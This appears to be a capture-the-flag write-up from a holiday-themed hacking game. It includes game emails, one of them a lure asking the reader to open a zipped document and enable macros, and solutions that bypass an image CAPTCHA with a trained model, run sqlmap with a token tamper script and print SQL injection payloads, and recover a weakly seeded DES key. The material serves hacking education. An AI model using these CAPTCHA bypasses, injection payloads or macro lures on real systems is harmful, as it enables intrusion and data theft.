'"1574356354.Vca01I45e32M258064.ip-172-31-47-72"' '"app.xml".~9~' '"document.xml".~2~' '"image1.jpeg".~7~' '"settings.xml".~4~' '"webSettings.xml".~7~'
'"1574356460.Vca01I45e34M267844.ip-172-31-47-72"' be59d43f1980243f6587820616fb76d3cba52379 '"document.xml".~20~' '"image1.jpeg".~8~' '"settings.xml".~5~' '"webSettings.xml".~8~'
'"1574356464.Vca01I45e36M705347.ip-172-31-47-72"' '"Buttercups_HOL404_assignment.zip"' '"document.xml".~3~' '"image1.jpeg".~9~' '"settings.xml".~6~' '"webSettings.xml".~9~'
'"1574356531.Vca01I45e3cM664595.ip-172-31-47-72"' Carolers.docx '"document.xml".~4~' '"image1.jpg"' '"settings.xml".~7~'
- Word Docs
Snowtrifle_HOL404_assignment.docx
Sugartree_HOL404_assignment.docx
- Emails
- To Carl Banas From Brownie Snowtrifle
Hey Prof! Here's my holiday cheer essay!
- To Carl Banas From Bushy Evergren
Hi Professor Banas!
My essay is attached.
Happy Holidays!
Bushy Evergren
Bushy Evergren<br>
- To Carl Banas From Carol Greenballs
I know what you're thinking. That Carol. She's gonna write up her essay on caroling. HOW BORING. Well look, I'm sick of people making fun of my name. It refers to joyous holiday songs. Problem is, people sometimes hear it as "carrel" which refers to a small cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling, which is what I'm doing right now, but what I won't be doing on christmas eve, when I'll be caroling.
Get it?
Thank you, professor banas!
I know what you're thinking. That Carol. She's gonna write up her essay on caroling. HOW BORING. Well look, I'm sick of people making fun of my name. It refers to joyous holiday songs. Problem is, people sometimes hear it as "carrel" which refers to a small
cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling, which is what I'm doing right now, but what I won't be doing
- To Carl Banas From Cherry Brandyfluff
Alright professor, here is my paper....
My break will be spent in a town where everyday is silent and grey. If you have any questions about my paper, I will be hiding on the promenade, etching a postcard with my favorite bottle of my namesake De Kuyper liquor and some marshmallow...
-Cherry
- To Carl Banas From Clove Fruitsparkles
Hi Carl,
It's ok if I call you Carl, right? Anyhoo, here's my essay!
- To Carl Banas From Cupcake Silverlog
Professor.
You know what I hate! I hate those newfangled LED christmas lights. Give me incandescent all the way, baby! I don't care if you can buy them at a big-box store for a pittance, I want the real thing. That's why I wrote my essay on the Lights of Cheer. Enjoy, and I'll see you after the break!
Cupcake
You know what I hate! I hate those newfangled LED christmas lights. Give me incandescent all the way, baby! I don't care if you can buy them at a big-box store for a pittance, I want the real thing. That's why I wrote my essay on the Lights of Cheer. Enjoy,
- To Carl Banas From Holly Evergreen
Hi Prof;
Thanks for the great assignment!
See you after the break,
Holly Evergreen
- To Carl Banas From Merry Fairybubbles
I am so in the holiday spirit right now with this paper being complete! My glass of champagne is bubbling over...
Thanks!
MF
- To Carl Banas From Minty Candycane
Hi Professor;
Finally done. Please confirm that you received this in time.
Thank you,
Minty Candycane
- To Carl Banas From Partridge Sugartree
Essay attached.
- To Carl Banas From Pepper Minstix
Dr Banas;
That assignment was really tough! Can I drop the grade on this one?
Thanks,
Pepper Minstix
- To Carl Banas From Plum Sparklepie
Dear Professor,
Please see attached my submission for the holiday cheer assignment. Do you think there is a chance I can still pass this class?
- To Carl Banas From Robin Wintercrystals
Professor!
Here is my submission before I head out for winter break...
This paper really crystalized for me at the last minute...
-RWC
- To Carl Banas From Shinny Upatree
Hey Prof Banas;
Hope I did better this time!
Happy Holidays
Shinny Upatree
- To Carl Banas From Sixpence Snowcane
Professor,
This assignment was quite an adventure. See you in class!
- To Carl Banas From Sparkle Redberry
I hope you enjoy the holidays, here is my paper!
Perhaps in springtime, we can go for an outing. I can meet you at the cemetary gates and we go inside and we gravely read the stones. All those people, all those lives, where are they now? With loves, and hates and passions just like mine, they were born and then they lived and then they died. It seems so unfair I want to cry...
Sorry just getting a little melancholy...I will be back to my Sparkly-self soon!
-Sparkle
Perhaps in springtime, we can go for an outing. I can meet you at the cemetary gates and we go inside and we gravely read the stones. All those people, all those lives, where are they now? With loves, and hates and passions just like mine, they were born and
- To Carl Banas From SugerPlum Mary
Hi professor. So sorry, I'm sick today. I might have typhoid. I'm just here listening to a high fidelity stream of jethro tull - my favorite tune is "cross-eyed mary." But I digress! I hope my essay isn't late, here it is.
(Sugerplum) Mary
- To Carl Banas From Turtledove Fairytree
You know Dasher and Dancer and Prancer and Vixen
Comet and Cupid and Donner and Blitzen
But do you recall
The most famous reindeer of all?
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
NEVER. GETS. OLD.
Best essay ever, prof banas!
T. Fairytree
- To Carl Banas From Wunorse Openslae
Hey prof. It's cold here in Oslo but sending you my assignment warms my heart. Merry Christmas, kind sir.
Wunose
- To Carl Banas From Yule Toffeetoes
Sorry this is so late professor! Hope you enjoy my paper!
Have a cool Yule!
😉
-Yule
- To Carl Banas From Bradly Buttercups
Professor Banas, I have completed my assignment. Please open the attached zip file with password 123456789 and then open the word document to view it. You will have to click "Enable Editing" then "Enable Content" to see it. This was a fun assignment. I hope you like it! --Bradly Buttercups
- To Bradly Buttercups From Carl Banas
Bradly,
I opened your assignment (which was not easy, by the way) and it seems you have not only not included an image per the instructions, but your assignment is identical to another student's assignment. This means your grade will be 0/100.
-csb
From: Bradly Buttercups <Bradly.Buttercups@eIfu.org>
Sent: Thursday, November 21, 2019 9:18 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Professor Banas, I have completed my assignment. Please open the attached zip file with password 123456789 and then open the word document to view it. You will have to click "Enable Editing" then "Enable Content" to see it. This was a fun assignment. I hope you like it! --Bradly Buttercups
- To Brownie Snowtrifle From Carl Banas
Brownie,
Excellent work! I love the abominable snowman. Well done.
100/100
-Prof Banas
From: Brownie Snowtrifle <Brownie.Snowtrifle@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:44 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hey Prof! Here's my holiday cheer essay!
- To Bushy Evergren From Carl Banas
Bushy,
I have some plagiarism concerns with your submission. Please make a follow up appointment during my office hours for us to discuss your academic integrity. Until that time, your grade will be 50/100.
csb
From: Bushy Evergren <Bushy.Evergren@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hi Professor Banas!
My essay is attached.
Happy Holidays!
Bushy Evergren
- To Carol Greenballs From Carl Banas
Carol,
Great work on your essay! I like that you did it on your name and it makes sense. I got a kick out of your puns.
100/100
csb
From: Carol Greenballs <Carol.Greenballs@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:14 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
I know what you're thinking. That Carol. She's gonna write up her essay on caroling. HOW BORING. Well look, I'm sick of people making fun of my name. It refers to joyous holiday songs. Problem is, people sometimes hear it as "carrel" which refers to a small cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling, which is what I'm doing right now, but what I won't be doing on christmas eve, when I'll be caroling.
Get it?
Thank you, professor banas!
is, people sometimes hear it as "carrel" which refers to a small cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling,
which is what I'm doing right now, but what I won't be doing on christmas eve, when I'll be caroling.<o:p></o:p></span></p>
- To Cherry Brandyfluff From Carl Banas
Cherry,
Nice job, although I'm not sure that was the best image.
95/100
csb
From: Cherry Brandyfluff <Cherry.Brandyfluff@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:59 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Alright professor, here is my paper....
My break will be spent in a town where everyday is silent and grey. If you have any questions about my paper, I will be hiding on the promenade, etching a postcard with my favorite bottle of my namesake De Kuyper liquor and some marshmallow...
-Cherry
- To Clove Fruitsparkles From Carl Banas
Clove,
No, I prefer Professor Banas. Thank you for submitting your assignment.
80/100
csb
From: Clove Fruitsparkles <Clove.Fruitsparkles@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:55 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hi Carl,
It's ok if I call you Carl, right? Anyhoo, here's my essay!
- To Cupcake Silverlog From Carl Banas
Cupcake,
I agree on the incandescent lights. Nice work on the essay.
100/100
csb
From: Cupcake Silverlog <Cupcake.Silverlog@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:58 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Professor.
You know what I hate! I hate those newfangled LED christmas lights. Give me incandescent all the way, baby! I don't care if you can buy them at a big-box store for a pittance, I want the real thing. That's why I wrote my essay on the Lights of Cheer. Enjoy, and I'll see you after the break!
Cupcake
That's why I wrote my essay on the Lights of Cheer. Enjoy, and I'll see you after the break!<o:p></o:p></span></p>
- To Holly Evergreen From Carl Banas
Holly,
Good job, but your assignment exceeds the specified length.
90/100
csb
From: Holly Evergreen <Holly.Evergreen@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:51 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hi Prof;
Thanks for the great assignment!
See you after the break,
Holly Evergreen
- To Merry Fairybubbles From Carl Banas
Merry,
Good job, but too long.
90/100
Csb
From: Merry Fairybubbles <Merry.Fairybubbles@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:52 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
I am so in the holiday spirit right now with this paper being complete! My glass of champagne is bubbling over...
Thanks!
MF
- To Minty Candycane From Carl Banas
Hi Minty,
You were on time.
80/100
-csb
From: Minty Candycane <Minty.Candycane@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:00 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hi Professor;
Finally done. Please confirm that you received this in time.
Thank you,
Minty Candycane
- To Partridge Sugartree From Carl Banas
Partridge,
Thank you for your submission.
80/100
csb
From: Partridge Sugartree <Partridge.Sugartree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Essay attached.
Thank you for your submission. <o:p></o:p></p>
- To Pepper Minstix From Carl Banas
Pepper,
Your grade for this is 80/100, which is better than several other of your assignments. Up to you if you want to drop.
csb
From: Pepper Minstix <Pepper.Minstix@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:56 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Dr Banas;
That assignment was really tough! Can I drop the grade on this one?
Thanks,
Pepper Minstix
- To Plum Sparklepie From Carl Banas
Plum,
Well done on this assignment but I'm afraid that with your previous lack of punctuality on assignments, you will not be able to pass this class.
100/100
-csb
From: Plum Sparklepie <Plum.Sparklepie@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:50 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Dear Professor,
Please see attached my submission for the holiday cheer assignment. Do you think there is a chance I can still pass this class?
- To Robin Wintercrystals From Carl Banas
Robin,
Well done. Very informative and thoughtful.
100/100
-Prof Banas
From: Robin Wintercrystals <Robin.Wintercrystals@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Professor!
Here is my submission before I head out for winter break...
This paper really crystalized for me at the last minute...
-RWC
- To Shinny Upatree From Carl Banas
Hi Shinny,
I like the use of an image with a Solider. Well done
95/100
-csb
From: Shinny Upatree <Shinny.Upatree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:05 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hey Prof Banas;
Hope I did better this time!
Happy Holidays
Shinny Upatree
Sixpence,
This is too long and is a plagiarized work. You should just add some context to why this is important to you.
50/100
csb
From: Sixpence Snowcane <Sixpence.Snowcane@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:53 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Professor,
This assignment was quite an adventure. See you in class!
- To Sparkle Redberry From Carl Banas
Hi Sparkle,
I'm not sure about the cemetery in the spring time. But I did receive your assignment.
90/100
csb
From: Sparkle Redberry <Sparkle.Redberry@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:08 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
I hope you enjoy the holidays, here is my paper!
Perhaps in springtime, we can go for an outing. I can meet you at the cemetary gates and we go inside and we gravely read the stones. All those people, all those lives, where are they now? With loves, and hates and passions just like mine, they were born and then they lived and then they died. It seems so unfair I want to cry...
Sorry just getting a little melancholy...I will be back to my Sparkly-self soon!
-Sparkle
- To SugerPlum Mary From Carl Banas
Hi Mary,
This works.
90/100
csb
From: SugerPlum Mary <SugerPlum.Mary@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:54 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hi professor. So sorry, I'm sick today. I might have typhoid. I'm just here listening to a high fidelity stream of jethro tull - my favorite tune is "cross-eyed mary." But I digress! I hope my essay isn't late, here it is.
(Sugerplum) Mary
- To Turtledove Fairytree From Carl Banas
Turtledove,
Great work! Thanks for the submission.
100/100
csb
From: Turtledove Fairytree <Turtledove.Fairytree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:09 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
You know Dasher and Dancer and Prancer and Vixen
Comet and Cupid and Donner and Blitzen
But do you recall
The most famous reindeer of all?
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
NEVER. GETS. OLD.
Best essay ever, prof banas!
T. Fairytree
- To Wunorse Openslae From Carl Banas
Wunorse,
What does this poem mean to you? It is a nice poem, but no context.
70/100
-csb
From: Wunorse Openslae <Wunorse.Openslae@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:48 AM
To Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Hey prof. It's cold here in Oslo but sending you my assignment warms my heart. Merry Christmas, kind sir.
Wunose
- To Yule Toffeetoes From Carl Banas
Yule,
Nice work, but I was looking for something a little less modern.
80/100
-Prof Banas
From: Yule Toffeetoes <Yule.Toffeetoes@students.elfu.org>
Sent: Thursday, November 21, 2019 8:41 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission
Sorry this is so late professor! Hope you enjoy my paper!
Have a cool Yule!
😉
-Yule
7) Get Access To The Steam Tunnels¶
Goal¶
Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.
Explanation¶
When we enter Minty’s dorm room, we see Krampus running into the closet and disappearing. On his belt is a key and on the desk is a key cutter.
In the closet there is a Shlage lock where we can try the keys we cut out.
If we take Krampus’s picture and put it into an image editor, we can determine the bitting depths of the key and make our own copy from the key cutter.
The easier way to do this, is to get the bitting templates from Divant Ollam’s github and overlay the template on the key to read the depths. But if for some reason you don’t want to use the templates or maybe you’re dealing with a key for which you can’t find the templates, you could print out a key of 012345 and 678999, you could use them as reference points and reverse the target key’s depths.
After you gain access to the tunnels, make your way to Krampus’s Lair and speak with him to get his full name.
Bitting Depths
122520
8) Bypassing the Frido Sleigh CAPTEHA¶
Goal¶
Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.
Location¶
Krampus’ Lair
Dialog¶
Krampus¶
- Before Solving
Hello there! I’m Krampus Hollyfeld.
I maintain the steam tunnels underneath Elf U,
Keeping all the elves warm and jolly.
Though I spend my time in the tunnels and smoke,
In this whole wide world, there's no happier bloke!
Yes, I borrowed Santa’s turtle doves for just a bit.
Someone left some scraps of paper near that fireplace, which is a big fire hazard.
I sent the turtle doves to fetch the paper scraps.
But, before I can tell you more, I need to know that I can trust you.
Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I'll know I can trust you.
- After Solving
You did it! Thank you so much. I can trust you!
To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.
As for those scraps of paper, I scanned those and put the images on my server.
I then threw the paper away.
Unfortunately, I managed to lock out my account on the server.
Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you're traveling around, be sure to solve any other challenges you happen across.
Solution¶
Explanation¶
After solving the key-bitting challenge and accessing the steam tunnels, we encounter Krampus who asks us to help him beat the Frido Sleigh contest in order to gain his trust. The contest is implementing a CAPTEHA that is only solvable by elves. He provides us with two downloads, a sample of images grabbed from the Frido Sleigh site and a his mostly completed bypass script.
https://downloads.elfu.org/capteha_api.py
https://downloads.elfu.org/capteha_images.tar.gz
Untarring/ungzipping the archive will gives us a directory structure with images already sorted for use with tensorflow. This effectively “tags” them so that we can train a machine learning model. Visiting the repo at https://github.com/chrisjd20/img_rec_tf_ml_demo which was in a hint for this challenge, we find a python script called retrain.py. Installing the dependencies and running the script builds an ML model by reading all of the images in the images_capteha.tar.gz that we got from Krampus.
python3 retrain.py --image_dir capteha_images
Depending on hardware, the model can be built in anywhere from 20 minutes to 2+ hours.
After the model is built, we can build our solution script by splicing together the contents of predict_images_using_trained_model.py and capteha_api.py, then adding a bit of code to tie it all together.
The first portion of our solution was simply the session creation and a GET request to grab the base64 images, their respective UUIDs, and the categories of images that should be selected. We solved it two ways, in-memory and by writing the images to disk, but idea is the same in both cases. Here we have the code to base64 decode the images and write them to disk using the UUID as the filename.
################################################################
yourREALemailAddress = "0x00000000@null.net"
# Creating a session to handle cookies
s = requests.Session()
url = "https://fridosleigh.com/"
json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
b64_images = json_resp['images'] # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
challenge_image_type = json_resp['select_type'].split(',') # The Image types the CAPTEHA Challenge is looking for.
challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
# Just converting these to images on disk for tf to read.
for i in range(0,len(b64_images)):
filename = 'unknown_images/' + b64_images[i]['uuid'] + '.png'
with open(filename, 'wb') as img:
img.write(base64.b64decode(b64_images[i]['base64']))
################################################################
What followed was a copy-paste of the code from predict_images_using_trained_model.py. The only thing we changed was the path to the ML model, so we won’t include the code here. After that, a few lines of code to create the needed CSV for submission of the solved captcha:
for prediction in prediction_results:
if prediction['prediction'] in challenge_image_types:
good_img.append(Path(prediction['img_full_path']).stem)
final_answer = ','.join(img for img in good_img)
The code simply grabs the name (minus the extension) of the files which do match the required challenge image types, and puts the string into a comma-seperated list of UUIDs which will be submitted as the final answer. What follows is the rest of the capteha_api.py script, and that’s all there is to it. If working from a traditional HDD instead of an SSD and if you have a large amound of memory, it may be more beneficial to keep the images in memory rather than writing to disk.
- If you’re running into timeout errors, read below.
Error
In the retrain.py (https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py) script, there are are options to use different models and to adjust the input image size.
Run floating-point version of Mobilenet:
```bash
python retrain.py --image_dir ~/flower_photos \
--tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/feature_vector/3
```
Run Mobilenet, instrumented for quantization:
```bash
python retrain.py --image_dir ~/flower_photos/ \
--tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/quantops/feature_vector/3
```
These instrumented models can be converted to fully quantized mobile models via
TensorFlow Lite.
There are different Mobilenet models to choose from, with a variety of file
size and latency options.
- The first number can be '100', '075', '050', or '025' to control the number
of neurons (activations of hidden layers); the number of weights (and hence
to some extent the file size and speed) shrinks with the square of that
fraction.
- The second number is the input image size. You can choose '224', '192',
'160', or '128', with smaller sizes giving faster speeds.
With this, we can retrain our model with smaller images:
retrain.py --image_dir capteha_images --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_128/quantops/feature_vector/3
The second number, 128, means to use an image that is 128x128 instead of the original 299x299.
Next, we need to adjust our script to use this new size. Failing to do this will result in error.
Error
ValueError: Cannot feed value of shape (1, 299, 299, 3) for Tensor ‘import/Placeholder:0’, which has shape ‘(?, 128, 128, 3)’
# Replace this:
def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
# With this:
def read_tensor_from_image_bytes(imagebytes, input_height=128, input_width=128, input_mean=0, input_std=255):
And now, even on less than ideal hardware, we can still (barely) bypass the CAPTEHA.
time python3 in_memory.py
python3 solution.py 9.84s user 1.14s system 98% cpu 11.151 total
You're A Winner of the Frido Sleigh Contest.eml
Frido Sleigh - A North Pole Cookie Company
Congratulations you have been selected as a winner of Frido Sleigh's Continuous Cookie Contest!
To receive your reward, simply attend KringleCon at Elf University and submit the following code in your badge:
8Ia8LiZEwvyZr2WO
Congratulations,
The Frido Sleigh Team
To Attend KringleCon at Elf University, following the link at kringlecon.com
Frido Sleigh, Inc.
123 Santa Claus Lane, Christmas Town, North-Pole 997095
9) Retrieve Scraps of Paper from Server¶
Goal¶
Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
Dialog¶
Krampus¶
- Before Solving
Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you're traveling around, be sure to solve any other challenges you happen across.
- After Solving
Wow! We’ve uncovered quite a nasty plot to destroy the holiday season.
We’ve gotta stop whomever is behind it!
I managed to find this protected document on one of the compromised machines in our environment.
I think our attacker was in the process of exfiltrating it.
I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it?
There are some smart people in the NetWars challenge room who may be able to help us.
Explanation¶
Start by identifying where we can input data - the application form looks like a good place to try. If we fill out the form and have the same email as someone else that already submitted, we receive a sql error which tells us we’re looking in the right place.
Then, if we start playing around with parameters by hand (in burp or zap) we will notice that any request we send a second time gets an invalid token error. This is because each POST request we make must have a “token” parameter obtained from “validator.php”. This token has an extremely short timeout, so if we want to use any sort of automated scanning, we’ll have to programmatically insert that value.
In the case of sqlmap, we can use a tamper script by making the request to “validator.php” and appending it and the parameter name to the end of the payload.
#!/usr/bin/env python
from lib.core.data import kb
from lib.core.enums import PRIORITY
import string
import requests
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
res = requests.get("https://studentportal.elfu.org/validator.php")
return payload + "&token=" + res.content
Now, we can set up burp (if we haven’t already) as a proxy for our attack, so we can get a better view into what’s going on.
sqlmap.py -u 'https://studentportal.elfu.org/application-received.php' --data='name=a&elfmail=csntravis%40b.com&program=a&phone=1111111111&whyme=a&essay=a' --tamper studentportal --proxy https://127.0.0.1:8000
If we send this as is to burp, we’ll see all of our requests are getting invalid token errors. Looking at the requests coming from sqlmap, the issue becomes apparent, the “&token=” is being url escaped to “%26token%3D” which is no good.
Burp can help us with this problem, using its “match and replace” functionality.
Now when we run sqlmap, our attacks are connecting. After letting it run for a while, it will eventually detect an injection point in one of the parameters.
Parameter: name (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=a'||(SELECT 0x5a4c4475 WHERE 4873=4873 AND (SELECT 2652 FROM(SELECT COUNT(*),CONCAT(0x716b787071,(SELECT (ELT(2652=2652,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&elfmail=csntravis@b.com&pro
gram=a&phone=1111111111&whyme=a&essay=a
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=a'||(SELECT 0x424a6e6c WHERE 2007=2007 AND (SELECT 9656 FROM (SELECT(SLEEP(5)))Vvrn))||'&elfmail=csntravis@b.com&program=a&phone=1111111111&whyme=a&essay=a
Now it’s time to dump the database. Since we didn’t already specify the -dump flag, we can add it in and specify the -s flag to continue off of our last session.
sqlmap.py -u 'https://studentportal.elfu.org/application-received.php' --data='name=a&elfmail=csntravis%40b.com&program=a&phone=1111111111&whyme=a&essay=a' --tamper studentportal --proxy https://127.0.0.1:8000 -s ~/.sqlmap/output/studentportal.elfu.org/session.sqlite -dump
After we get the database dump, we should see a krampus table that has the following urls.
krampus
id,path
1,/krampus/0f5f510e.png
2,/krampus/1cc7e121.png
3,/krampus/439f15e6.png
4,/krampus/667d6896.png
5,/krampus/adb798ca.png
6,/krampus/ba417715.png
All that’s left now is to pull down all of the images and assemble them.
for i in `cat krampus.csv | grep krampus | cut -d ',' -f2`; do wget https://studentportal.elfu.org/$i ; done
After combining the paper, the note reads “… Super Sled-o-matic …” as the project santa was working on.
Misc¶
There is also a students table in the database that contains everyone’s application.
students
id,bio,name,degree,student_number
1,My goal is to be a happy elf!,Elfie,Raindeer Husbandry,392363902026
2,"I'm just a elf. Yes, I'm only a elf. And I'm sitting here on Santa's sleigh, it's a long, long journey To the christmas tree. It's a long, long wait while I'm tinkering in the factory. But I know I'll be making kids smile on the holiday... At least
I hope and pray that I will But today. I'm still ju",Elferson,Dreamineering,39210852026
3,Have you seen my list??? It is pretty high tech!,Alabaster Snowball,Geospatial Intelligence,392363902026
4,I am an engineer and the inventor of Santa's magic toy-making machine.,Bushy Evergreen,Composites and Engineering,392363902026
5,My goal is to be a happy elf!,Wunorse Openslae,Toy Design,39236372526
6,My goal is to be a happy elf!,Bushy Evergreen,Present Wrapping,392363128026
7,Check out my makeshift armour made of kitchen pots and pans!!!,Pepper Minstix,Reindeer Husbandry,392363902026
8,My goal is to be a happy elf!,Sugarplum Mary,Present Wrapping,5682168522137
9,Santa and I are besties for life!!!,Shinny Upatree,Holiday Cheer,228755779218
10) Recover Cleartext Document¶
Goal¶
Files¶
https://downloads.elfu.org/elfscrow.exe https://downloads.elfu.org/elfscrow.pdb https://downloads.elfu.org/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc
Solution¶
Answer
Machine Learning Sleigh Route Finder
Explanation¶
https://elfscrow.elfu.org/ server. It has two api endpoints, /api/store and /api/retrieve.
- do_encrypt
read_file calls “Microsoft Enhanced Cryptographic Provider v1.0” which is used to provide the following algorithms: RSA RC2 RC4 DES 3DES
calls CryptAcquireContextA which interacts with the previous to actually do encryption
then calls generate_key later calls CryptImportKey which is deprecated but transfers a key blob into a crypto service provider There’s a comment about using DES-CBC Calls CryptEncrypt which presumably imports the file with the key store_key
- generate_key
gets current epoch time (calls a time function that calls _time64) then calls super_secure_srand then calls super_secure_random 8 times -the key that comes out of the binary is always 8 bytes
- super_secure_srand
There’s a comment that says “Seed = %d\n\n” which i’m assuming is taking the epoch time as the seed iob_func is returning the file descriptor looks like it stores arg_0 in state - arg0 should be the epoch time
- super_secure_random
This is where the magic happens. If we look one of the numbers in the function, we’re lead to https://rosettacode.org/wiki/Linear_congruential_generator Specifically, it’s using the Microsoft implementation
require 'openssl'
#Can be found from running the binary or from looking at the loop in assembly
KEY_LENGTH = 8
#Implement the Linear Congruential Algorithm from rosettacode
def generate_key(seed)
key = ""
1.upto(KEY_LENGTH) do
seed = (214013 * seed + 2531011)
key += (((seed & 0x7fff_ffff) >> 16)& 0x0FF).chr
end
return key
end
def decrypt(data, key)
#Can be found in the comments
c = OpenSSL::Cipher::DES.new('CBC')
c.decrypt
c.key = key
return (c.update(data) + c.final())
end
